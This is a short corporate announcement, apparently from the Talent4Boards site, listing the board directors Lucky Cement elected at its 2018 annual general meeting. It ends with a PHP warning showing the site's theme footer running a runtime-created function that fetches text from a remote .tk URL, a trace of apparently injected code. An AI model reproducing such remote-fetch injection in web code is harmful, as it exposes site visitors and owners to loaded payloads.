– PAKISTAN, Karachi – Lucky Cement Limited (LON:LKCS), today announced that the following candidates have been elected as Directors of our for a period of three years in the 25th Annual General Meeting of the company held on September 28, 2018:

  • Mr. Muhammad Yunus Tabba – Chairman / Non-Executive Director
  • Mr. Muhammad Ali Tabba – Chief Executive/Director
  • Mr. Muhammad Sohail Tabba – Non-Executive Director
  • Mr. Jawed Yunus Tabba – Non-Executive Director
  • Mrs. Mariam Tabba Khan – Non-Executive Director
  • Mr. Manzoor Ahmed – Independent Director
  • Mr. Mohammad Javed Iqbal – Independent Director

The company also informed that the Board of Directors has re-appointed Muhammad Yunus Tabba as the Chairman of the Board of Directors for another term of three years alongside Muhammad Ali Tabba as the Chief Executive re-appointed for another term of three (3) years

For more information : http://www.lucky-cement.com

- DisclaimerNews, data and statement included in this release are intended exclusively for general information purposes. Talent4Boards accepts neither liability for the consequences of the reader’s reliance, nor responsibility for the adequacy or accuracy of the information. No data or statement in this release should be considered for decisions about securities referred. Product and brand names used in this release maybe trademarks or registered trademarks of their respective owners.

Comments are closed.

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/sites/t/talent4boards.com/public_html/wp-content/themes/Aqua/footer.php(54) : runtime-created function on line 1